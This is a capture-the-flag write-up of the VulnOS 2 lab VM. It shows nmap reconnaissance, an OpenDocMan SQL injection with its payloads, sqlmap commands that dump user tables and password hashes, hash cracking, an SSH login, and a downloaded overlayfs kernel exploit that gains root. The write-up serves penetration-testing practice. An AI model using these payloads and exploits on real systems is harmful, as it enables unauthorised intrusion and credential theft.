VulnOS 2 Writeup

This time, we are doing VulnOS 2 vulnerable vm.

To begin with, I nmap the target for active services

[email protected]:~# nmap -A -T4 -sV -v -p- 192.168.56.104

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-21 11:17 EEST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:17
Completed NSE at 11:17, 0.00s elapsed
Initiating NSE at 11:17
Completed NSE at 11:17, 0.00s elapsed
Initiating ARP Ping Scan at 11:17
Scanning 192.168.56.104 [1 port]
Completed ARP Ping Scan at 11:17, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:17
Completed Parallel DNS resolution of 1 host. at 11:17, 0.03s elapsed
Initiating SYN Stealth Scan at 11:17
Scanning 192.168.56.104 [65535 ports]
Discovered open port 80/tcp on 192.168.56.104
Discovered open port 22/tcp on 192.168.56.104
Discovered open port 6667/tcp on 192.168.56.104
Completed SYN Stealth Scan at 11:18, 20.41s elapsed (65535 total ports)
Initiating Service scan at 11:18
Scanning 3 services on 192.168.56.104
Completed Service scan at 11:18, 11.05s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.104
NSE: Script scanning 192.168.56.104.
Initiating NSE at 11:18
Completed NSE at 11:19, 69.54s elapsed
Initiating NSE at 11:19
Completed NSE at 11:19, 0.02s elapsed
Nmap scan report for 192.168.56.104
Host is up (0.00098s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_  256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd
MAC Address: 08:00:27:57:4F:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.001 days (since Sat May 21 11:17:41 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.98 ms 192.168.56.104

NSE: Script Post-scanning.
Initiating NSE at 11:19
Completed NSE at 11:19, 0.00s elapsed
Initiating NSE at 11:19
Completed NSE at 11:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.49 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65772 (2.648MB)

So we've got SSH, IRC and a webserver. Let's see what's on that webserver.

By navigating to http://192.168.56.104/ , I am presented with a webpage telling me to navigate to /jabc which is the company website in question. Let's head over there and see what I can find.


So it's a website about selling AI products for espionage etc etc. By taking a closer look at the page's source code, it can be seen that it's a Drupal website.


However, droopescan doesn't show anything interesting apart from some warnings, so I keep browsing the site for any clues on how to move forward.

Everything seems to be fine, until I land on the "documentation" page.


It's pretty much blank. Let's take a closer look at the source of the documentation page.


Indeed, there is some content that I cannot see with a naked eye. It says that the documentation platfor is in /jabcd0cs/ so let's see what's in there.


I'm presented with and OpenDocMan page. After logging in, we can see some pieces of documentation posted by user "min web".


Also, we see at the bottom that the version of OpenDocMan used is 1.2.7. I look for vulnerabilities for it

[email protected]:~# searchsploit opendocman 1.2.7
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                             |  Path
                                                                                                                           | (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities                                                                                | ./php/webapps/32075.txt
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------


Let's see what this is about. In the text it's stated that there is an SQL injection vulnerability in ajax_udf.php and more specifically in parameter add_value.

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.

1) SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below displays version of the MySQL server:

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9

Let's fire up sqlmap and see what we can find.

[email protected]:~# sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --risk=3 --level=5 --threads=4
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:45:52

[11:45:52] [INFO] testing connection to the target URL
[11:45:53] [INFO] heuristics detected web page charset 'ISO-8859-2'
[11:45:53] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:45:53] [INFO] testing if the target URL is stable
[11:45:54] [INFO] target URL is stable
[11:45:54] [INFO] heuristics detected web page charset 'ascii'
[11:45:54] [WARNING] heuristic (basic) test shows that GET parameter 'add_value' might not be injectable
[11:45:54] [INFO] testing for SQL injection on GET parameter 'add_value'
[11:45:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:45:59] [WARNING] reflective value(s) found and filtering out
[11:46:00] [INFO] GET parameter 'add_value' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[11:46:00] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
[11:46:15] [INFO] GET parameter 'add_value' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
[11:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:46:15] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[11:46:15] [INFO] checking if the injection point on GET parameter 'add_value' is a false positive
GET parameter 'add_value' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 148 HTTP(s) requests:
---
Parameter: add_value (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=1&add_value=odm_user WHERE 9669=9669 AND 9046=9046-- WWea

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: q=1&add_value=odm_user WHERE 2883=2883 AND (SELECT * FROM (SELECT(SLEEP(5)))tuJF)-- duly
---
[11:46:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[11:46:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.104'

Some of the above output has been omitted because of it's length, however we can see that our target is indeed vulnerable. Let's get the databases.

[email protected]:~# sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --threads=4 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin

Again, some output has been omitted.

At this point, I'm spending some time enumerating the databases, looking for tables, users, privileges etc etc.

Trying to get a valid ssh login out of the user accounts I find, I come across the following credentials in "jabcd0cs", the database of opendocman, inside table "odm_user"

[email protected]:~# sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --threads=2 -D jabcd0cs -T odm_user --dump
         _
 ___ ___| |_____ ___ ___  {1.0.5.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
Database: jabcd0cs
Table: odm_user
[2 entries]
+----+--------------------+-------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| id | Email              | phone       | username | password                                 | last_name | first_name | department | pw_reset_code |
+----+--------------------+-------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| 1  | [email protected] | 5555551212  | webmin   | b78aae356709f8c31118ea613980954b         | min       | web        | 2          |        |
| 2  | [email protected]  | 555 5555555 | guest    | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest     | guest      | 2          | NULL          |
+----+--------------------+-------------+----------+------------------------------------------+-----------+------------+------------+---------------+

As we can see, we got the guest password by automatically cracking it through sqlmap. Now let's see what can be done about user "webmin" the hash looks like and md5 so first, let's see if an online cracker can help with that. md5cracker.org is one the one I'll use.

We navigate at the site, paste our hash and wait for it. After a while...


After a couple of seconds, there we have it. The password of user "webmin" is "webmin1980".

First things first, let's try to connect through ssh.

[email protected]:~# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat May 21 11:33:04 CEST 2016

  System load:  0.0               Processes:           89
  Usage of /:   5.8% of 29.91GB   Users logged in:     0
  Memory usage: 17%               IP address for eth0: 192.168.56.104
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Sat May 21 11:33:04 2016 from 192.168.56.4
$ python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:~$

Aaand I'm in! Plus, with that small beautiful python on-liner I now have an interactive shell.

After a little bit of enumeration, we know that the system is ubuntu 14.04 and the version of the kernel.

[email protected]:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
[email protected]:~$ cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
[email protected]:~$

So let's give a try to an overlayfs exploit that has worked before.

[email protected]:~$ wget https://www.exploit-db.com/download/37292
--2016-05-21 11:52:51--  https://www.exploit-db.com/download/37292
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: ‘37292’

100%[======================================>] 5,123       --.-K/s   in 0s      

2016-05-21 11:52:51 (371 MB/s) - ‘37292’ saved [5123/5123]

[email protected]:~$ mv 37292 exploit.c
[email protected]:~$ gcc -o exploit exploit.c 
[email protected]:~$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
[email protected]:~$ ./exploit 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
# python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/home/webmin#

And that's it, I got root, and an interactive root shell for that matter. So now, let's go grab the flag.

[email protected]:/home/webmin# updatedb
[email protected]:/home/webmin# locate flag.txt
/root/flag.txt
[email protected]:/home/webmin# cat /root/flag.txt 
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

There we have it. Flag captured! Now, what do I think of A.I? I think that google is Skynet and at some point we will have a "matrix" or "terminator" situation in our hands.

Thanks a lot c4b3rw0lf for this vm, and once again, many thanks to Vulnhub for making such things possible. Cheers!

Comments